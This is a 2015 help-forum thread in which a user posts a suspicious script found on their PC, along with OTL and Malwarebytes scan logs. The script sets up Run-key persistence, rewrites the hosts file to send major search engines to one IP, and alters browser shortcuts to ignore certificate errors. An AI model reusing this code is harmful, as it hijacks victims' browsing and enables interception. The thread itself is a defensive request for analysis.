Show Posts

This section allows you to view all posts made by this member. Note that you can only see posts made in areas you currently have access to.


Messages - tomfullerton

Pages: [1]
1
RogueKiller / Re: windows/SysWOW64/rundll32.exe halp me ?
« on: January 24, 2015, 06:28:49 AM »
Does anyone around here have any clue what this script is doing?
-This was a file without an extension, found in C:\Users\
Please let me know even if you know a bit of it.

Code: [Select]
@echo off Jones\AppData\Roaming\Windaws.bat
REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "appdat3" /t REG_SZ /F /D "C:\Users\Tom Jones\AppData\Roaming\Sys32.vbs" Jones\AppData\Roaming\Windaws.bat
REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "appdat4" /t REG_SZ /F /D "C:\Users\Tom Jones\AppData\Roaming\Sys33.vbs" Jones\AppData\Roaming\Windaws.bat
REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "appdat1" /t REG_SZ /F /D "C:\Users\Tom Jones\AppData\Roaming\Macrosoft.vbs" Jones\AppData\Roaming\Windaws.bat
REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "appdat2" /t REG_SZ /F /D "C:\Users\Tom Jones\AppData\Roaming\Systm.vbs" Jones\AppData\Roaming\Windaws.bat
REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "appdat" /t REG_SZ /F /D "C:\Users\Tom Jones\AppData\Roaming\Windaws.bat" Jones\AppData\Roaming\Windaws.bat
REG ADD "HKCU\Software\Microsoft\Internet Explorer\Main" /V "Start Page" /D "http://www.google.com" /F Jones\AppData\Roaming\Windaws.bat
REG ADD "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel" /v HomePage /t REG_DWORD /d 1 /f Jones\AppData\Roaming\Windaws.bat
cd /D "%APPDATA%\Mozilla\Firefox\Profiles" Jones\AppData\Roaming\Windaws.bat
cd *.default Jones\AppData\Roaming\Windaws.bat
set buzaar=%cd% Jones\AppData\Roaming\Windaws.bat
echo user_pref("browser.newtab.url", "http://www.google.com");>>"%buzaar%\prefs.js" Jones\AppData\Roaming\Windaws.bat
echo user_pref("browser.startup.homepage", "http://www.google.com");>>"%buzaar%\prefs.js" Jones\AppData\Roaming\Windaws.bat
set buzaar= Jones\AppData\Roaming\Windaws.bat
cd %windir% Jones\AppData\Roaming\Windaws.bat
set bugalatasligala=%windir%\System32\drivers\etc\hosts Jones\AppData\Roaming\Windaws.bat
find "69.162.120.131 www.google.com" %bugalatasligala% || echo 69.162.120.131 www.google.com>>%bugalatasligala% Jones\AppData\Roaming\Windaws.bat
find "69.162.120.131 www.bing.com" %bugalatasligala% || echo 69.162.120.131 www.bing.com>>%bugalatasligala% Jones\AppData\Roaming\Windaws.bat
find "69.162.120.131 search.yahoo.com" %bugalatasligala% || echo 69.162.120.131 search.yahoo.com>>%bugalatasligala% Jones\AppData\Roaming\Windaws.bat
find "69.162.120.131 www.google.co.uk" %bugalatasligala% || echo 69.162.120.131 www.google.co.uk>>%bugalatasligala% Jones\AppData\Roaming\Windaws.bat
find "69.162.120.131 www.google.ca" %bugalatasligala% || echo 69.162.120.131 www.google.ca>>%bugalatasligala% Jones\AppData\Roaming\Windaws.bat
find "69.162.120.131 www.google.com.tr" %bugalatasligala% || echo 69.162.120.131 www.google.com.tr>>%bugalatasligala% Jones\AppData\Roaming\Windaws.bat
find "69.162.120.131 isearch.babylon.com" %bugalatasligala% || echo 69.162.120.131 isearch.babylon.com>>%bugalatasligala% Jones\AppData\Roaming\Windaws.bat
find "69.162.120.131 search.conduit.com" %bugalatasligala% || echo 69.162.120.131 search.conduit.com>>%bugalatasligala% Jones\AppData\Roaming\Windaws.bat
find "69.162.120.131 www.yahoo.com" %bugalatasligala% || echo 69.162.120.131 www.yahoo.com>>%bugalatasligala% Jones\AppData\Roaming\Windaws.bat
find "69.162.120.131 us.yhs4.search.yahoo.com" %bugalatasligala% || echo 69.162.120.131 us.yhs4.search.yahoo.com>>%bugalatasligala% Jones\AppData\Roaming\Windaws.bat
find "69.162.120.131 r.search.yahoo.com" %bugalatasligala% || echo 69.162.120.131 r.search.yahoo.com>>%bugalatasligala% Jones\AppData\Roaming\Windaws.bat
find "69.162.120.131 www.aol.com" %bugalatasligala% || echo 69.162.120.131 www.aol.com>>%bugalatasligala% Jones\AppData\Roaming\Windaws.bat
find "69.162.120.131 search.aol.com" %bugalatasligala% || echo 69.162.120.131 search.aol.com>>%bugalatasligala% Jones\AppData\Roaming\Windaws.bat
find "69.162.120.131 search.comcast.net" %bugalatasligala% || echo 69.162.120.131 search.comcast.net>>%bugalatasligala% Jones\AppData\Roaming\Windaws.bat
find "69.162.120.131 www.google.co.in" %bugalatasligala% || echo 69.162.120.131 www.google.co.in>>%bugalatasligala% Jones\AppData\Roaming\Windaws.bat
find "69.162.120.131 www.ask.com" %bugalatasligala% || echo 69.162.120.131 www.ask.com>>%bugalatasligala% Jones\AppData\Roaming\Windaws.bat
find "69.162.120.131 xfinity.comcast.net" %bugalatasligala% || echo 69.162.120.131 xfinity.comcast.net>>%bugalatasligala% Jones\AppData\Roaming\Windaws.bat
find "69.162.120.131 search.avg.com" %bugalatasligala% || echo 69.162.120.131 search.avg.com>>%bugalatasligala% Jones\AppData\Roaming\Windaws.bat
exit Jones\AppData\Roaming\Windaws.bat
SET wsc = WScript.CreateObject("WScript.Shell") Jones\AppData\Roaming\Systm.vbs
SET fso = WScript.CreateObject("Scripting.FileSystemObject") Jones\AppData\Roaming\Systm.vbs
If (fso.FileExists(wsc.SpecialFolders("AppData") & "\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.LNK")) Then Jones\AppData\Roaming\Systm.vbs
SET bozcaada = wsc.CreateShortcut(wsc.SpecialFolders("AppData") & "\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.LNK") Jones\AppData\Roaming\Systm.vbs
If (fso.FileExists("C:\Program Files (x86)\Google\Chrome\Application\chrome.exe")) Then Jones\AppData\Roaming\Systm.vbs
bozcaada.targetpath = "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" Jones\AppData\Roaming\Systm.vbs
else Jones\AppData\Roaming\Systm.vbs
bozcaada.targetpath = "C:\Program Files\Google\Chrome\Application\chrome.exe" Jones\AppData\Roaming\Systm.vbs
End If Jones\AppData\Roaming\Systm.vbs
bozcaada.Arguments = "http://www.google.com -ignore-certificate-errors --disable-show-modal-dialog --disable-infobars" Jones\AppData\Roaming\Systm.vbs
bozcaada.save() Jones\AppData\Roaming\Systm.vbs
End If 'uz Jones\AppData\Roaming\Systm.vbs
If (fso.FileExists(wsc.SpecialFolders("AppData") & "\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.LNK")) Then Jones\AppData\Roaming\Sys33.vbs
SET bozcaada = wsc.CreateShortcut(wsc.SpecialFolders("AppData") & "\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.LNK") Jones\AppData\Roaming\Sys33.vbs
If (fso.FileExists("C:\Program Files (x86)\Mozilla Firefox\firefox.exe")) Then Jones\AppData\Roaming\Sys33.vbs
bozcaada.targetpath = "C:\Program Files (x86)\Mozilla Firefox\firefox.exe" Jones\AppData\Roaming\Sys33.vbs
bozcaada.targetpath = "C:\Program Files\Mozilla Firefox\firefox.exe" Jones\AppData\Roaming\Sys33.vbs
bozcaada.Arguments = "http://www.google.com" Jones\AppData\Roaming\Sys33.vbs
End If 'ez Jones\AppData\Roaming\Sys33.vbs
If (fso.FileExists(wsc.SpecialFolders("desktop") & "\Mozilla Firefox.LNK")) Then Jones\AppData\Roaming\Sys32.vbs
SET bozcaada = wsc.CreateShortcut(wsc.SpecialFolders("desktop") & "\Mozilla Firefox.LNK") Jones\AppData\Roaming\Sys32.vbs
End If 'oz Jones\AppData\Roaming\Sys32.vbs
If (fso.FileExists(wsc.SpecialFolders("desktop") & "\Google Chrome.LNK")) Then Jones\AppData\Roaming\Macrosoft.vbs
SET bozcaada = wsc.CreateShortcut(wsc.SpecialFolders("desktop") & "\Google Chrome.LNK") Jones\AppData\Roaming\Macrosoft.vbs
End If 'az Jones\AppData\Roaming\Macrosoft.vbs

2
RogueKiller / Re: windows/SysWOW64/rundll32.exe halp me ?
« on: January 23, 2015, 10:34:50 PM »
Quote from: tomfullerton on January 23, 2015, 09:22:17 PM

 
========== Custom Scans ==========
 
< C:\Users\*.vbs /S >
[2009/07/14 00:08:49 | 000,000,006 | -H-- | C] () -- C:\Windows\Tasks\SA.DAT
[2009/07/14 00:08:49 | 000,032,624 | ---- | C] () -- C:\Windows\Tasks\SCHEDLGU.TXT
[2013/10/12 14:32:49 | 000,000,880 | ---- | C] () -- C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-265094073-1043058997-3425087786-1000Core.job
[2013/10/12 14:32:49 | 000,000,932 | ---- | C] () -- C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-265094073-1043058997-3425087786-1000UA.job
 
< C:\Users\*.bat /S >
[2008/11/29 12:05:58 | 000,000,053 | ---- | M] () -- C:\Users\Tom Jones\Downloads\OC\RealTemp_370\RTShutDown.bat
 
========== Alternate Data Streams ==========
 
@Alternate Data Stream - 194 bytes -> C:\ProgramData\TEMP:8927A071

< End of report >

Regarding this part of the scan, where you try to search any file that ends in .vbs or .bat, I don't think the file I was referring to will show up since it had NO extension. I had to manually change it to .txt in order to be able to attach it here.

Please take a look at it if you can, it's just a text file that I think would be called from somewhere else and then after execution as a .bat file some other program may have renamed it, i.e. remove the extension altogether.

-attached it.

3
RogueKiller / Re: windows/SysWOW64/rundll32.exe halp me ?
« on: January 23, 2015, 09:22:17 PM »
----------------************** Continuing from the other post ************-------------------




========== Files/Folders - Created Within 30 Days ==========
 
[2015/01/23 12:35:19 | 000,000,000 | ---D | C] -- C:\_OTL
[2015/01/22 20:49:27 | 000,000,000 | ---D | C] -- C:\AdwCleaner
[2015/01/22 20:00:38 | 000,000,000 | ---D | C] -- C:\FRST
[2015/01/22 00:05:16 | 000,000,000 | ---D | C] -- C:\Users\Tom Jones\.jmc
[2015/01/21 23:50:56 | 000,000,000 | ---D | C] -- C:\ProgramData\Malwarebytes' Anti-Malware (portable)
[2015/01/21 23:49:49 | 000,000,000 | ---D | C] -- C:\Users\Tom Jones\Desktop\mbar
[2015/01/21 22:33:14 | 000,000,000 | ---D | C] -- C:\ProgramData\RogueKiller
[2015/01/21 21:53:25 | 000,000,000 | ---D | C] -- C:\ProgramData\Spybot - Search & Destroy
[2015/01/15 15:06:11 | 000,000,000 | ---D | C] -- C:\Users\Tom Jones\Documents\FIFA 15
[2015/01/13 16:45:28 | 005,553,592 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\ntoskrnl.exe
[2015/01/13 16:45:27 | 003,971,512 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\ntkrnlpa.exe
[2015/01/13 16:45:27 | 003,916,728 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\ntoskrnl.exe
[2015/01/13 16:45:27 | 000,503,808 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\srcore.dll
[2015/01/13 16:45:27 | 000,296,960 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\rstrui.exe
[2015/01/13 16:45:27 | 000,050,176 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\srclient.dll
[2015/01/13 16:45:26 | 000,156,672 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\ncsi.dll
[2015/01/13 16:45:26 | 000,087,040 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\TSWbPrxy.exe
[2014/12/26 22:56:58 | 000,000,000 | ---D | C] -- C:\Users\Tom Jones\.gradle
[2014/12/26 00:22:00 | 000,000,000 | ---D | C] -- C:\Users\Tom Jones\.AndroidStudio
[2014/12/25 23:59:06 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Android Studio
[2014/12/25 23:59:06 | 000,000,000 | ---D | C] -- C:\Users\Tom Jones\.android
[2014/12/25 23:58:57 | 000,084,992 | ---- | C] (Intel  Corporation) -- C:\Windows\SysNative\drivers\IntelHaxm.sys
[2014/09/16 23:06:27 | 000,148,736 | ---- | C] (Avanquest Software) -- C:\ProgramData\hpe1289.dll
[2014/09/16 22:57:10 | 000,148,736 | ---- | C] (Avanquest Software) -- C:\ProgramData\hpe92DE.dll
[1 C:\Program Files (x86)\*.tmp files -> C:\Program Files (x86)\*.tmp -> ]
 
========== Files - Modified Within 30 Days ==========
 
[2015/01/23 12:53:12 | 000,021,280 | -H-- | M] () -- C:\Windows\SysNative\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
[2015/01/23 12:53:12 | 000,021,280 | -H-- | M] () -- C:\Windows\SysNative\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
[2015/01/23 12:52:03 | 000,880,194 | ---- | M] () -- C:\Windows\SysNative\PerfStringBackup.INI
[2015/01/23 12:52:03 | 000,731,498 | ---- | M] () -- C:\Windows\SysNative\perfh009.dat
[2015/01/23 12:52:03 | 000,148,396 | ---- | M] () -- C:\Windows\SysNative\perfc009.dat
[2015/01/23 12:46:07 | 000,067,584 | --S- | M] () -- C:\Windows\bootstat.dat
[2015/01/23 08:13:31 | 000,129,752 | ---- | M] (Malwarebytes Corporation) -- C:\Windows\SysNative\drivers\MBAMSwissArmy.sys
[2015/01/23 00:22:00 | 000,000,932 | ---- | M] () -- C:\Windows\tasks\GoogleUpdateTaskUserS-1-5-21-265094073-1043058997-3425087786-1000UA.job
[2015/01/22 21:11:30 | 000,097,496 | ---- | M] (Malwarebytes Corporation) -- C:\Windows\SysNative\drivers\mbamchameleon.sys
[2015/01/22 20:55:37 | 000,701,616 | ---- | M] (Adobe Systems Incorporated) -- C:\Windows\SysWow64\FlashPlayerApp.exe
[2015/01/22 20:55:37 | 000,071,344 | ---- | M] (Adobe Systems Incorporated) -- C:\Windows\SysWow64\FlashPlayerCPLApp.cpl
[2015/01/22 19:22:00 | 000,000,880 | ---- | M] () -- C:\Windows\tasks\GoogleUpdateTaskUserS-1-5-21-265094073-1043058997-3425087786-1000Core.job
[2015/01/22 11:23:36 | 000,037,624 | ---- | M] () -- C:\Windows\SysNative\drivers\TrueSight.sys
[2015/01/22 00:02:51 | 000,000,085 | ---- | M] () -- C:\Windows\wininit.ini
[2015/01/20 16:15:27 | 000,000,958 | ---- | M] () -- C:\Users\Tom Jones\Desktop\Android Studio.lnk
[2015/01/16 22:23:19 | 000,002,356 | ---- | M] () -- C:\Users\Tom Jones\Desktop\Google Chrome.lnk
[2015/01/06 13:14:01 | 000,000,600 | ---- | M] () -- C:\Users\Tom Jones\AppData\Local\PUTTY.RND
[1 C:\Program Files (x86)\*.tmp files -> C:\Program Files (x86)\*.tmp -> ]
 
========== Files Created - No Company Name ==========
 
[2015/01/22 00:02:50 | 000,000,085 | ---- | C] () -- C:\Windows\wininit.ini
[2015/01/21 22:33:15 | 000,037,624 | ---- | C] () -- C:\Windows\SysNative\drivers\TrueSight.sys
[2015/01/20 16:15:27 | 000,000,958 | ---- | C] () -- C:\Users\Tom Jones\Desktop\Android Studio.lnk
[2014/10/05 15:08:05 | 000,000,057 | ---- | C] () -- C:\Users\Tom Jones\.gitconfig
[2014/10/05 14:55:06 | 000,001,833 | ---- | C] () -- C:\Users\Tom Jones\.bash_history
[2014/07/01 00:29:30 | 000,000,396 | RHS- | C] () -- C:\ProgramData\ntuser.pol
[2014/05/29 16:14:15 | 000,008,192 | ---- | C] () -- C:\Users\Tom Jones\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
[2013/12/20 23:51:16 | 000,000,212 | ---- | C] () -- C:\Windows\ildasmfnt.bin
[2013/07/20 00:48:09 | 002,580,552 | R--- | C] () -- C:\Windows\SysWow64\pbsvc.exe
[2013/07/01 18:05:35 | 000,000,001 | ---- | C] () -- C:\Users\Tom Jones\AppData\Local\llftool.4.30.agreement
[2013/04/16 22:52:23 | 000,000,322 | ---- | C] () -- C:\Users\Tom Jones\configuration_log.csv
[2012/10/07 15:51:26 | 000,000,600 | ---- | C] () -- C:\Users\Tom Jones\AppData\Local\PUTTY.RND
[2012/03/26 17:26:16 | 000,007,602 | ---- | C] () -- C:\Users\Tom Jones\AppData\Local\resmon.resmoncfg
 
========== ZeroAccess Check ==========
 
[2009/07/13 23:55:00 | 000,000,227 | RHS- | M] () -- C:\Windows\assembly\Desktop.ini
 
[HKEY_CURRENT_USER\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32] /64
 
[HKEY_CURRENT_USER\Software\Classes\Wow6432node\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]
 
[HKEY_CURRENT_USER\Software\Classes\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32] /64
 
[HKEY_CURRENT_USER\Software\Classes\Wow6432node\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32]
 
[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32] /64
"" = C:\Windows\SysNative\shell32.dll -- [2014/06/24 21:05:42 | 014,175,744 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Apartment
 
[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]
"" = %SystemRoot%\system32\shell32.dll -- [2014/06/24 20:41:30 | 012,874,240 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Apartment
 
[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32] /64
"" = C:\Windows\SysNative\wbem\fastprox.dll -- [2009/07/13 20:40:51 | 000,909,312 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Free
 
[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32]
"" = %systemroot%\system32\wbem\fastprox.dll -- [2010/11/20 22:24:25 | 000,606,208 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Free
 
[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32] /64
"" = C:\Windows\SysNative\wbem\wbemess.dll -- [2009/07/13 20:41:56 | 000,505,856 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Both
 
[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32]
 
========== LOP Check ==========
 
[2014/11/20 23:45:39 | 000,000,000 | ---D | M] -- C:\Users\Tom Jones\AppData\Roaming\.emacs.d
[2014/08/26 23:14:19 | 000,000,000 | ---D | M] -- C:\Users\Tom Jones\AppData\Roaming\.mono
[2012/03/24 12:24:09 | 000,000,000 | ---D | M] -- C:\Users\Tom Jones\AppData\Roaming\Auslogics
[2014/01/26 02:06:42 | 000,000,000 | ---D | M] -- C:\Users\Tom Jones\AppData\Roaming\BSplayer PRO
[2014/03/19 11:05:16 | 000,000,000 | ---D | M] -- C:\Users\Tom Jones\AppData\Roaming\com.valve.FTP
[2014/05/03 16:31:45 | 000,000,000 | ---D | M] -- C:\Users\Tom Jones\AppData\Roaming\FileZilla
[2014/01/21 20:36:22 | 000,000,000 | ---D | M] -- C:\Users\Tom Jones\AppData\Roaming\iFunbox_UserCache
[2013/02/03 03:07:13 | 000,000,000 | ---D | M] -- C:\Users\Tom Jones\AppData\Roaming\Immunity Debugger
[2012/03/24 07:32:39 | 000,000,000 | ---D | M] -- C:\Users\Tom Jones\AppData\Roaming\Leadertech
[2014/03/08 00:15:05 | 000,000,000 | ---D | M] -- C:\Users\Tom Jones\AppData\Roaming\Mael
[2013/10/26 00:03:48 | 000,000,000 | ---D | M] -- C:\Users\Tom Jones\AppData\Roaming\Milestone
[2015/01/20 23:10:21 | 000,000,000 | ---D | M] -- C:\Users\Tom Jones\AppData\Roaming\MiniLyrics
[2012/05/30 21:01:56 | 000,000,000 | ---D | M] -- C:\Users\Tom Jones\AppData\Roaming\MotioninJoy
[2014/09/07 17:40:03 | 000,000,000 | ---D | M] -- C:\Users\Tom Jones\AppData\Roaming\Motorola
[2014/09/07 16:47:38 | 000,000,000 | ---D | M] -- C:\Users\Tom Jones\AppData\Roaming\Motorola Mobility
[2013/04/28 22:49:07 | 000,000,000 | ---D | M] -- C:\Users\Tom Jones\AppData\Roaming\Mumble
[2014/04/01 11:52:05 | 000,000,000 | ---D | M] -- C:\Users\Tom Jones\AppData\Roaming\MySQL
[2014/03/16 19:16:38 | 000,000,000 | ---D | M] -- C:\Users\Tom Jones\AppData\Roaming\NetBeans
[2014/08/27 18:25:54 | 000,000,000 | ---D | M] -- C:\Users\Tom Jones\AppData\Roaming\Notepad++
[2013/12/21 00:41:29 | 000,000,000 | ---D | M] -- C:\Users\Tom Jones\AppData\Roaming\NuGet
[2014/10/10 09:51:25 | 000,000,000 | ---D | M] -- C:\Users\Tom Jones\AppData\Roaming\OfficeRecovery
[2014/02/22 12:56:28 | 000,000,000 | ---D | M] -- C:\Users\Tom Jones\AppData\Roaming\Oracle
[2013/07/21 18:41:06 | 000,000,000 | ---D | M] -- C:\Users\Tom Jones\AppData\Roaming\Origin
[2012/10/26 16:42:46 | 000,000,000 | ---D | M] -- C:\Users\Tom Jones\AppData\Roaming\redsn0w
[2014/09/16 22:55:54 | 000,000,000 | ---D | M] -- C:\Users\Tom Jones\AppData\Roaming\Sony
[2014/12/07 18:45:15 | 000,000,000 | ---D | M] -- C:\Users\Tom Jones\AppData\Roaming\SSH
[2014/08/26 23:14:03 | 000,000,000 | ---D | M] -- C:\Users\Tom Jones\AppData\Roaming\Steam
[2014/04/26 14:07:24 | 000,000,000 | ---D | M] -- C:\Users\Tom Jones\AppData\Roaming\Sublime Text 3
[2012/11/20 15:05:01 | 000,000,000 | ---D | M] -- C:\Users\Tom Jones\AppData\Roaming\SystemRequirementsLab
[2014/04/27 22:14:02 | 000,000,000 | ---D | M] -- C:\Users\Tom Jones\AppData\Roaming\TeamViewer
[2013/02/05 04:31:48 | 000,000,000 | ---D | M] -- C:\Users\Tom Jones\AppData\Roaming\TightVNC
[2012/05/20 03:19:59 | 000,000,000 | ---D | M] -- C:\Users\Tom Jones\AppData\Roaming\Ubisoft
[2015/01/22 20:59:07 | 000,000,000 | ---D | M] -- C:\Users\Tom Jones\AppData\Roaming\uTorrent
[2013/12/20 23:53:18 | 000,000,000 | ---D | M] -- C:\Users\Tom Jones\AppData\Roaming\VisualAssist
 
========== Purity Check ==========
 
 
 
========== Custom Scans ==========
 
< C:\Users\*.vbs /S >
[2009/07/14 00:08:49 | 000,000,006 | -H-- | C] () -- C:\Windows\Tasks\SA.DAT
[2009/07/14 00:08:49 | 000,032,624 | ---- | C] () -- C:\Windows\Tasks\SCHEDLGU.TXT
[2013/10/12 14:32:49 | 000,000,880 | ---- | C] () -- C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-265094073-1043058997-3425087786-1000Core.job
[2013/10/12 14:32:49 | 000,000,932 | ---- | C] () -- C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-265094073-1043058997-3425087786-1000UA.job
 
< C:\Users\*.bat /S >
[2008/11/29 12:05:58 | 000,000,053 | ---- | M] () -- C:\Users\Tom Jones\Downloads\OC\RealTemp_370\RTShutDown.bat
 
========== Alternate Data Streams ==========
 
@Alternate Data Stream - 194 bytes -> C:\ProgramData\TEMP:8927A071

< End of report >

---------------------------------------------------------------------------------------------------------------------



3. New Malwarebytes scan produced:

Malwarebytes Anti-Malware
www.malwarebytes.org

Scan Date: 1/23/2015
Scan Time: 1:56:15 PM
Logfile:
Administrator: Yes

Version: 2.00.4.1028
Malware Database: v2015.01.23.06
Rootkit Database: v2015.01.14.01
License: Free
Malware Protection: Disabled
Malicious Website Protection: Disabled
Self-protection: Disabled

OS: Windows 7 Service Pack 1
CPU: x64
File System: NTFS
User: Tom Jones

Scan Type: Custom Scan
Result: Completed
Objects Scanned: 821488
Time Elapsed: 1 hr, 2 min, 58 sec

Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Enabled
Heuristics: Enabled
PUP: Enabled
PUM: Enabled

Processes: 0
(No malicious items detected)

Modules: 0
(No malicious items detected)

Registry Keys: 0
(No malicious items detected)

Registry Values: 0
(No malicious items detected)

Registry Data: 0
(No malicious items detected)

Folders: 0
(No malicious items detected)

Files: 0
(No malicious items detected)

Physical Sectors: 0
(No malicious items detected)


(end)

4
RogueKiller / Re: windows/SysWOW64/rundll32.exe halp me ?
« on: January 23, 2015, 09:21:44 PM »
------------------***************Continuing from the other post ************-----------------



========== FireFox ==========
 
FF:64bit: - HKLM\Software\MozillaPlugins\@java.com/DTPlugin,version=10.51.2: C:\Program Files\Java\jre7\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)
FF:64bit: - HKLM\Software\MozillaPlugins\@java.com/JavaPlugin,version=10.51.2: C:\Program Files\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
FF:64bit: - HKLM\Software\MozillaPlugins\@microsoft.com/GENUINE: C:\Windows\system32\Wat\npWatWeb.dll (Microsoft Corporation)
FF:64bit: - HKLM\Software\MozillaPlugins\@Microsoft.com/NpCtrl,version=1.0: C:\Program Files\Microsoft Silverlight\5.1.31211.0\npctrl.dll ( Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@adobe.com/FlashPlayer: C:\Windows\SysWOW64\Macromed\Flash\NPSWF32.dll ()
FF - HKLM\Software\MozillaPlugins\@Apple.com/iTunes,version=:  File not found
FF - HKLM\Software\MozillaPlugins\@Apple.com/iTunes,version=1.0: E:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll ()
FF - HKLM\Software\MozillaPlugins\@java.com/DTPlugin,version=10.71.2: C:\Program Files (x86)\Java\jre7\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)
FF - HKLM\Software\MozillaPlugins\@java.com/JavaPlugin,version=10.71.2: C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
FF - HKLM\Software\MozillaPlugins\@microsoft.com/GENUINE: C:\Windows\system32\Wat\npWatWeb.dll (Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@Microsoft.com/NpCtrl,version=1.0: C:\Program Files (x86)\Microsoft Silverlight\5.1.31211.0\npctrl.dll ( Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@spoon.net/Spoon Plugin 3.33: C:\Program Files (x86)\Spoon\3.33.8.485\npMozillaSpoonPlugin.dll File not found
FF - HKLM\Software\MozillaPlugins\@wolfram.com/Mathematica: C:\Program Files (x86)\Common Files\Wolfram Research\Browser\8.0.4.2609412\npmathplugin.dll File not found
FF - HKLM\Software\MozillaPlugins\Adobe Reader: C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF - HKCU\Software\MozillaPlugins\@tools.google.com/Google Update;version=3: C:\Users\Tom Jones\AppData\Local\Google\Update\1.3.25.11\npGoogleUpdate3.dll (Google Inc.)
FF - HKCU\Software\MozillaPlugins\@tools.google.com/Google Update;version=9: C:\Users\Tom Jones\AppData\Local\Google\Update\1.3.25.11\npGoogleUpdate3.dll (Google Inc.)
FF - HKCU\Software\MozillaPlugins\ubisoft.com/uplaypc: C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher\npuplaypc.dll File not found
 
 
[2014/02/09 23:37:26 | 000,215,040 | ---- | M] (Cisco WebEx LLC) -- C:\Program Files (x86)\mozilla firefox\plugins\npatgpc.dll
[2011/12/09 12:23:32 | 000,012,800 | ---- | M] (Nullsoft, Inc.) -- C:\Program Files (x86)\mozilla firefox\plugins\npwachk.dll
 
========== Chrome  ==========
 
CHR - default_search_provider:  (Enabled)
CHR - default_search_provider: search_url =
CHR - default_search_provider: suggest_url =
CHR - plugin: Shockwave Flash (Enabled) = C:\Users\Tom Jones\AppData\Local\Google\Chrome\Application\39.0.2171.99\PepperFlash\pepflashplayer.dll
CHR - plugin: Chrome Remote Desktop Viewer (Disabled) = internal-remoting-viewer
CHR - plugin: Native Client (Enabled) = C:\Users\Tom Jones\AppData\Local\Google\Chrome\Application\39.0.2171.99\ppGoogleNaClPluginChrome.dll
CHR - plugin: Chrome PDF Viewer (Enabled) = C:\Users\Tom Jones\AppData\Local\Google\Chrome\Application\39.0.2171.99\pdf.dll
CHR - plugin: Conduit Chrome Plugin (Enabled) = C:\Users\Tom Jones\AppData\Local\Google\Chrome\User Data\Default\Extensions\ljfhnpbhhmmhdamdbpmajlonoecdobln\10.13.20.29_0\plugins/ConduitChromeApiPlugin.dll
CHR - plugin: Conduit Radio Plugin (Enabled) = C:\Users\Tom Jones\AppData\Local\Google\Chrome\User Data\Default\Extensions\ljfhnpbhhmmhdamdbpmajlonoecdobln\10.13.20.29_0\plugins/np-cwmp.dll
CHR - plugin: Adobe Acrobat (Enabled) = C:\Program Files (x86)\Adobe\Reader 11.0\Reader\Browser\nppdf32.dll
CHR - plugin: 2007 Microsoft Office system (Enabled) = C:\Program Files (x86)\Mozilla Firefox\plugins\NPOFF12.DLL
CHR - plugin: Winamp Application Detector (Enabled) = C:\Program Files (x86)\Mozilla Firefox\plugins\npwachk.dll
